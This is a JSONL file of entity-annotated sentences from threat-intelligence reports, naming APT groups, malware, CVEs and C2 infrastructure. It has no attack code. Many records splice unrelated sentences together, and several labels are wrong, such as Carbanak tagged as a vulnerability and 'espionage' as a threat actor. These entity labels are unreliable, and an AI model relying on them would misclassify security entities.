{"text": "FakeSpy has been in the wild since 2017 ; this latest campaign indicates that it has become more powerful . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . Gallmaker may well have continued to avoid detection were it not for Symantec 's technology .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: group": [[150, 155]], "ORGANIZATION: FireEye": [[161, 168]], "THREAT_ACTOR: APT33": [[179, 184]], "ORGANIZATION: defense": [[257, 264]], "ORGANIZATION: aerospace": [[267, 276]], "ORGANIZATION: petrochemical": [[281, 294]], "THREAT_ACTOR: Gallmaker": [[311, 320]], "ORGANIZATION: Symantec": [[380, 388]]}, "info": {"id": "cyberner_stix_train_001703", "source": "cyberner_stix_train"}}
{"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 . In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder ’s Shanghai system so the backdoor can talk to the C2 server software . Greatness offers the ability for users to bypass targets ’ multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": {"TOOL: C2": [[428, 430]], "TOOL: Greatness": [[449, 458]]}, "info": {"id": "cyberner_stix_train_001704", "source": "cyberner_stix_train"}}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign corporations": [[80, 100]], "ORGANIZATION: foreign governments": [[131, 150]], "ORGANIZATION: journalists": [[153, 164]], "ORGANIZATION: dissidents": [[182, 192]], "MALWARE: Infy": [[256, 260]]}, "info": {"id": "cyberner_stix_train_001705", "source": "cyberner_stix_train"}}
{"text": "The archive contains two files ; the first is an executable file , while the second is a decoy PDF document .", "spans": {"TOOL: PDF": [[95, 98]]}, "info": {"id": "cyberner_stix_train_001706", "source": "cyberner_stix_train"}}
{"text": "‘ SimBad ’ comes with a respected list of capabilities on the user ’ s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . Suckfly conducted a multistage attack against an e-commerce organization .", "spans": {"MALWARE: SimBad": [[2, 8]], "THREAT_ACTOR: attackers": [[266, 275]], "TOOL: Worldwide Interbank Financial Telecommunication": [[297, 344]], "TOOL: SWIFT": [[347, 352]], "ORGANIZATION: e-commerce organization": [[450, 473]]}, "info": {"id": "cyberner_stix_train_001707", "source": "cyberner_stix_train"}}
{"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[51, 58]], "THREAT_ACTOR: espionage": [[76, 85]], "ORGANIZATION: Kaspersky Lab": [[173, 186], [314, 327]], "VULNERABILITY: zero-day": [[252, 260]]}, "info": {"id": "cyberner_stix_train_001708", "source": "cyberner_stix_train"}}
{"text": "Quasar is a .NET Framework-based open-source RAT .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: .NET": [[12, 16]], "TOOL: RAT": [[45, 48]]}, "info": {"id": "cyberner_stix_train_001709", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT 's C2 techniques are dictated by its remote access tools .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "TOOL: C2": [[20, 22]]}, "info": {"id": "cyberner_stix_train_001710", "source": "cyberner_stix_train"}}
{"text": "Access to an individual's personal or corporate email account provides a substantial amount of useful intelligence , and threat actors could also leverage the access to launch additional attacks to penetrate the network of an associated organization .", "spans": {"TOOL: email": [[48, 53]]}, "info": {"id": "cyberner_stix_train_001711", "source": "cyberner_stix_train"}}
{"text": "As a result of our ongoing efforts , we identified significant changes to the group ’s attack methodology .", "spans": {}, "info": {"id": "cyberner_stix_train_001712", "source": "cyberner_stix_train"}}
{"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The “ Agent Smith ” campaign is primarily targeted at Indian users , who represent 59 % of the impacted population . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": {"MALWARE: Agent Smith": [[281, 292]], "MALWARE: decoy documents": [[396, 411]], "ORGANIZATION: politically": [[462, 473]], "ORGANIZATION: militarily": [[477, 487]], "ORGANIZATION: political": [[547, 556]], "FILEPATH: exe": [[599, 602]], "VULNERABILITY: CVE-2021 - 26858": [[751, 767]]}, "info": {"id": "cyberner_stix_train_001713", "source": "cyberner_stix_train"}}
{"text": "TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "SYSTEM: SWCs": [[17, 21]], "TOOL: emails": [[45, 51]], "TOOL: ZIP": [[57, 60]]}, "info": {"id": "cyberner_stix_train_001714", "source": "cyberner_stix_train"}}
{"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years . To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale . But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": {"MALWARE: FrozenCell": [[36, 46]], "ORGANIZATION: New York Times": [[157, 171]], "ORGANIZATION: Mandiant": [[176, 184]], "THREAT_ACTOR: APT1": [[529, 533]], "THREAT_ACTOR: bad actors": [[642, 652]], "SYSTEM: command and control servers": [[716, 743]], "THREAT_ACTOR: phishing bots - as - a - service": [[747, 779]]}, "info": {"id": "cyberner_stix_train_001715", "source": "cyberner_stix_train"}}
{"text": "In October 2019 , third-party researchers described a phishing campaign that used C2 infrastructure that CTU researchers attribute to BRONZE PRESIDENT .", "spans": {"TOOL: C2": [[82, 84]], "ORGANIZATION: CTU": [[105, 108]], "THREAT_ACTOR: BRONZE PRESIDENT": [[134, 150]]}, "info": {"id": "cyberner_stix_train_001716", "source": "cyberner_stix_train"}}
{"text": "In particular , we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and ‘ access management ’ tradecraft – both groups were constantly going back into the environment to change out their implants , modify persistent methods , move to new Command & Control channels and perform other tasks to try to stay ahead of being detected .", "spans": {"TOOL: Command & Control": [[296, 313]]}, "info": {"id": "cyberner_stix_train_001717", "source": "cyberner_stix_train"}}
{"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": {"THREAT_ACTOR: APT34": [[185, 190]], "VULNERABILITY: Microsoft Office vulnerability": [[205, 235]], "VULNERABILITY: CVE-2017-11882": [[236, 250]], "TOOL: POWRUNER": [[261, 269]], "TOOL: BONDUPDATER": [[274, 285]], "ORGANIZATION: Microsoft": [[309, 318]], "ORGANIZATION: oil and gas": [[340, 351]], "MALWARE: greensky27.vicp.net": [[401, 420]], "THREAT_ACTOR: Naikon": [[444, 450]], "ORGANIZATION: energy resources": [[546, 562]]}, "info": {"id": "cyberner_stix_train_001718", "source": "cyberner_stix_train"}}
{"text": "DLL side loading has been used to maintain persistence on the compromised system .", "spans": {"TOOL: DLL": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001719", "source": "cyberner_stix_train"}}
{"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . We believe that the IP addresses from Canada , Russia and NorACT are analysis systems of antivirus companies or security researchers .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]], "ORGANIZATION: antivirus companies": [[304, 323]]}, "info": {"id": "cyberner_stix_train_001720", "source": "cyberner_stix_train"}}
{"text": "These spear-phishing emails would contain links that eventually lead the victim to becoming infected with CozyDuke .", "spans": {"TOOL: emails": [[21, 27]], "MALWARE: CozyDuke": [[106, 114]]}, "info": {"id": "cyberner_stix_train_001721", "source": "cyberner_stix_train"}}
{"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": {"MALWARE: They": [[0, 4]], "MALWARE: Blue Termite": [[238, 250]]}, "info": {"id": "cyberner_stix_train_001722", "source": "cyberner_stix_train"}}
{"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": {"THREAT_ACTOR: groups": [[117, 123]], "THREAT_ACTOR: Buhtrap": [[134, 141]], "THREAT_ACTOR: Corkow": [[144, 150]], "THREAT_ACTOR: Carbanak": [[155, 163]], "ORGANIZATION: financial institutions": [[229, 251]], "ORGANIZATION: customers": [[262, 271]], "MALWARE: ThreeDollars": [[299, 311]]}, "info": {"id": "cyberner_stix_train_001723", "source": "cyberner_stix_train"}}
{"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"TOOL: Xbash malware": [[104, 117]], "THREAT_ACTOR: Wild Neutron": [[156, 168]], "MALWARE: stolen code signing certificate": [[195, 226]], "ORGANIZATION: electronics": [[250, 261]], "TOOL: Flash Player": [[288, 300]], "VULNERABILITY: exploit": [[301, 308]]}, "info": {"id": "cyberner_stix_train_001724", "source": "cyberner_stix_train"}}
{"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": {"THREAT_ACTOR: STRONTIUM": [[29, 38]]}, "info": {"id": "cyberner_stix_train_001725", "source": "cyberner_stix_train"}}
{"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: EternalBlue exploit": [[46, 65]], "TOOL: open source tool": [[74, 90]], "TOOL: Responder": [[91, 100]], "VULNERABILITY: zero-day": [[196, 204]], "TOOL: Flash": [[222, 227]]}, "info": {"id": "cyberner_stix_train_001726", "source": "cyberner_stix_train"}}
{"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack . The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe . Once a system was exploited a unique downloader was dropped onto the victim ’s disk , containing a customized micro backdoor written in Assembler .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[130, 147]], "THREAT_ACTOR: Emissary Panda": [[164, 178]], "FILEPATH: hpqhvind.exe": [[531, 543]], "TOOL: Assembler": [[682, 691]]}, "info": {"id": "cyberner_stix_train_001727", "source": "cyberner_stix_train"}}
{"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts Lazarus is a very active attack group involved in both cyber crime and espionage . The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “ RMS ” software : a legitimate remote administration tool produced by the Russian company “ TektonIT ” .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Lazarus": [[488, 495]], "TOOL: SFX": [[662, 665]], "TOOL: RMS": [[689, 692]], "TOOL: TektonIT": [[780, 788]]}, "info": {"id": "cyberner_stix_train_001728", "source": "cyberner_stix_train"}}
{"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": {"ORGANIZATION: Microsoft": [[23, 32]], "VULNERABILITY: CVE-2017-11882": [[52, 66]], "ORGANIZATION: FireEye": [[87, 94]], "THREAT_ACTOR: attacker": [[107, 115]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "ORGANIZATION: government organization": [[184, 207]], "ORGANIZATION: online video game industry": [[349, 375]]}, "info": {"id": "cyberner_stix_train_001729", "source": "cyberner_stix_train"}}
{"text": "However , a coincidence seems unlikely , and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network .", "spans": {"ORGANIZATION: CTU": [[45, 48]], "THREAT_ACTOR: TG-4127": [[74, 81]], "TOOL: emails": [[105, 111]], "ORGANIZATION: DNC": [[169, 172]]}, "info": {"id": "cyberner_stix_train_001730", "source": "cyberner_stix_train"}}
{"text": "Although this file itself is not particularly interesting , the older ( native ) Downeks versions also creates a file in Appdata\\Roaming , with identical data .", "spans": {"MALWARE: Downeks": [[81, 88]], "TOOL: Appdata\\Roaming": [[121, 136]]}, "info": {"id": "cyberner_stix_train_001731", "source": "cyberner_stix_train"}}
{"text": "There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"THREAT_ACTOR: Suckfly": [[26, 33]]}, "info": {"id": "cyberner_stix_train_001732", "source": "cyberner_stix_train"}}
{"text": "] com http : //www.i4vip [ . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . The Seedworm group is the only group known to use the Powermud backdoor .", "spans": {"VULNERABILITY: Carbanak": [[61, 69]], "VULNERABILITY: CVE-2013-3660": [[238, 251]], "THREAT_ACTOR: Seedworm group": [[291, 305]], "MALWARE: Powermud backdoor": [[341, 358]]}, "info": {"id": "cyberner_stix_train_001733", "source": "cyberner_stix_train"}}
{"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": {"MALWARE: UMBRAGE": [[0, 7]], "VULNERABILITY: exploit": [[273, 280]], "VULNERABILITY: CVE-2017-1182": [[281, 294]], "FILEPATH: Microsoft Equation Editor": [[312, 337]], "FILEPATH: 'EQNEDT32.exe'": [[340, 354]]}, "info": {"id": "cyberner_stix_train_001734", "source": "cyberner_stix_train"}}
{"text": "From the 185.25.50.93 C2 IP , we discovered another hard-coded user agent being used by Zebrocy :", "spans": {"IP_ADDRESS: 185.25.50.93": [[9, 21]], "TOOL: C2": [[22, 24]], "MALWARE: Zebrocy": [[88, 95]]}, "info": {"id": "cyberner_stix_train_001735", "source": "cyberner_stix_train"}}
{"text": "From where we sit , 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners , coinciding with lighter interest in Central Asian targets , and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East .", "spans": {"THREAT_ACTOR: Sofacy": [[25, 31]], "ORGANIZATION: NATO": [[70, 74]]}, "info": {"id": "cyberner_stix_train_001736", "source": "cyberner_stix_train"}}
{"text": "It is clear that on all stages there are at least two layers . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": {"ORGANIZATION: Trend Micro": [[77, 88]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[122, 141]], "SYSTEM: Windows": [[195, 202]], "FILEPATH: \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll": [[214, 257]], "ORGANIZATION: The Ashley Madison Affair": [[282, 307]], "ORGANIZATION: Hulu": [[333, 337]], "ORGANIZATION: Disney+": [[366, 373]]}, "info": {"id": "cyberner_stix_train_001737", "source": "cyberner_stix_train"}}
{"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"MALWARE: archive": [[14, 21]], "VULNERABILITY: vulnerability": [[82, 95]], "FILEPATH: documents": [[137, 146]], "VULNERABILITY: CVE-2012-0158": [[230, 243]], "TOOL: Microsoft Word": [[299, 313]], "VULNERABILITY: vulnerabilities": [[314, 329]]}, "info": {"id": "cyberner_stix_train_001738", "source": "cyberner_stix_train"}}
{"text": "Version # 2 : June - Aug. 2019 — Domain : somtum [ . Cadelle , uses Backdoor.Cadelspy . FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT . APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": {"TOOL: Backdoor.Cadelspy": [[68, 85]], "ORGANIZATION: FireEye": [[88, 95]], "MALWARE: THREEBYTE": [[189, 198]], "MALWARE: WATERSPOUT": [[203, 213]], "THREAT_ACTOR: APT33": [[216, 221]]}, "info": {"id": "cyberner_stix_train_001739", "source": "cyberner_stix_train"}}
{"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . They have different functions and ACTs of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {"TOOL: Bookworm samples": [[16, 32]], "ORGANIZATION: businesses": [[310, 320]]}, "info": {"id": "cyberner_stix_train_001740", "source": "cyberner_stix_train"}}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "THREAT_ACTOR: Leafminer": [[92, 101]], "VULNERABILITY: exploit": [[116, 123]], "TOOL: SMB": [[216, 219]], "VULNERABILITY: vulnerabilities": [[220, 235]], "ORGANIZATION: Microsoft": [[249, 258]]}, "info": {"id": "cyberner_stix_train_001741", "source": "cyberner_stix_train"}}
{"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise . Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab . These individuals are targeting companies due to a difference in values .", "spans": {"ORGANIZATION: telecommunications providers": [[203, 231]], "ORGANIZATION: IT services agencies": [[235, 255]], "THREAT_ACTOR: Seedworm actors": [[282, 297]], "MALWARE: Derusbi": [[335, 342]], "FILEPATH: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab": [[354, 413]]}, "info": {"id": "cyberner_stix_train_001742", "source": "cyberner_stix_train"}}
{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": {"MALWARE: attachment": [[35, 45]], "TOOL: NetTraveler": [[79, 90]], "MALWARE: DLL side-loading": [[99, 115]], "TOOL: DLL": [[159, 162], [476, 479]], "MALWARE: Visma": [[201, 206]], "THREAT_ACTOR: APT10": [[263, 268]], "MALWARE: 1.bat": [[304, 309]], "MALWARE: cu.exe": [[312, 318]], "MALWARE: ss.rar": [[321, 327]], "MALWARE: r.exe": [[330, 335]], "MALWARE: pd.exe": [[338, 344]], "ORGANIZATION: Rapid7": [[368, 374]], "FILEPATH: gup.exe": [[417, 424]], "FILEPATH: ANEL": [[562, 566]]}, "info": {"id": "cyberner_stix_train_001743", "source": "cyberner_stix_train"}}
{"text": "In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": {"MALWARE: Winnti": [[30, 36]], "THREAT_ACTOR: BARIUM": [[90, 96]], "THREAT_ACTOR: LEAD": [[101, 105]]}, "info": {"id": "cyberner_stix_train_001744", "source": "cyberner_stix_train"}}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "FILEPATH: date string hardcoded": [[361, 382]], "MALWARE: Bookworm sample": [[393, 408]]}, "info": {"id": "cyberner_stix_train_001745", "source": "cyberner_stix_train"}}
{"text": "In addition to the feature base it already possesses and the money that can be made from the rental , it could evolve to compete with the mightiest Android banking Trojans . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"SYSTEM: Android": [[148, 155]], "THREAT_ACTOR: SectorJ04": [[249, 258]], "ORGANIZATION: electronics": [[314, 325]], "ORGANIZATION: telecommunications": [[330, 348]], "ORGANIZATION: international": [[351, 364]], "ORGANIZATION: manufacturing": [[377, 390]], "ORGANIZATION: Secureworks": [[432, 443]], "THREAT_ACTOR: BRONZE BUTLER": [[455, 468]], "VULNERABILITY: CVE-2016-7836": [[535, 548]]}, "info": {"id": "cyberner_stix_train_001746", "source": "cyberner_stix_train"}}
{"text": "People who want to know if their Android devices are infected can download the Check Point app here . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group . Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK ’s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": {"SYSTEM: Android": [[33, 40]], "ORGANIZATION: Check Point": [[79, 90]], "TOOL: installers": [[133, 143]], "TOOL: loaders": [[146, 153]], "TOOL: uninstallers": [[160, 172]], "THREAT_ACTOR: Lazarus Group": [[329, 342]], "MALWARE: Pupy RAT": [[345, 353]], "MALWARE: Backdoor.Patpoopy": [[356, 373]], "MALWARE: LIGHTWORK ’s": [[620, 632]], "VULNERABILITY: IEC-104 protocol": [[646, 662]]}, "info": {"id": "cyberner_stix_train_001747", "source": "cyberner_stix_train"}}
{"text": "Once PoisonIvy was installed , it contacted a C&C server on TCP port 80 using an encrypted communication protocol .", "spans": {"MALWARE: PoisonIvy": [[5, 14]], "TOOL: C&C": [[46, 49]]}, "info": {"id": "cyberner_stix_train_001748", "source": "cyberner_stix_train"}}
{"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": {"MALWARE: Anubis": [[47, 53]], "SYSTEM: Anubis": [[123, 129]], "THREAT_ACTOR: APT10": [[256, 261]], "ORGANIZATION: IT service": [[310, 320]], "ORGANIZATION: (MSPs)": [[331, 337]], "MALWARE: Daserf variant": [[496, 510]]}, "info": {"id": "cyberner_stix_train_001749", "source": "cyberner_stix_train"}}
{"text": "The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen , so it waits for the targeted application to be launched and then parses all nodes to find text messages : Note that the implant needs special permission to use the Accessibility Service API , but there is a command that performs a request with a phishing text displayed to the user to obtain such permission . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": {"SYSTEM: Android": [[21, 28]], "THREAT_ACTOR: Operation Kingphish": [[487, 506]], "THREAT_ACTOR: Strider": [[578, 585], [604, 611]], "THREAT_ACTOR: ProjectSauron .": [[588, 603]]}, "info": {"id": "cyberner_stix_train_001750", "source": "cyberner_stix_train"}}
{"text": "The dropped file ( officeupdate.exe ) is then executed by the macro code using the PowerShell script . njRAT is a Remote Access Tool ( RAT ) used mostly by the actor groups in the middle east .", "spans": {"FILEPATH: officeupdate.exe": [[19, 35]], "TOOL: macro code": [[62, 72]], "TOOL: PowerShell script": [[83, 100]], "MALWARE: njRAT": [[103, 108]], "TOOL: Remote Access Tool": [[114, 132]], "MALWARE: RAT": [[135, 138]]}, "info": {"id": "cyberner_stix_train_001751", "source": "cyberner_stix_train"}}
{"text": "Those apps use the same techniques to monetize their actions . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks . Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": {"ORGANIZATION: government": [[150, 160]], "SYSTEM: Cisco Secure protections": [[356, 380]], "THREAT_ACTOR: the types of spam": [[408, 425]]}, "info": {"id": "cyberner_stix_train_001752", "source": "cyberner_stix_train"}}
{"text": "This analysis will be revisited below , along with an examination of two other PUTTER PANDA tools : pngdowner and httpclient . These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[79, 91]], "TOOL: pngdowner": [[100, 109]], "TOOL: httpclient": [[114, 124]], "FILEPATH: Softether VPN 4.12”": [[192, 211]], "FILEPATH: psiphon3”": [[216, 225]], "FILEPATH: Microsoft Office activators”": [[231, 259]]}, "info": {"id": "cyberner_stix_train_001753", "source": "cyberner_stix_train"}}
{"text": "The Dukes primarily use spear-phishing emails when attempting to infect victims with their malware .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "TOOL: emails": [[39, 45]]}, "info": {"id": "cyberner_stix_train_001754", "source": "cyberner_stix_train"}}
{"text": "First , it creates a new directory : “ %LOCAL_APPDATA%\\Microsoft\\Windows ” .", "spans": {"SYSTEM: %LOCAL_APPDATA%\\Microsoft\\Windows": [[39, 72]]}, "info": {"id": "cyberner_stix_train_001755", "source": "cyberner_stix_train"}}
{"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise . However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[27, 51]], "TOOL: GandCrab": [[150, 158]], "ORGANIZATION: technology": [[210, 220]], "ORGANIZATION: Symantec": [[273, 281]], "ORGANIZATION: pharmaceutical firms": [[350, 370]]}, "info": {"id": "cyberner_stix_train_001756", "source": "cyberner_stix_train"}}
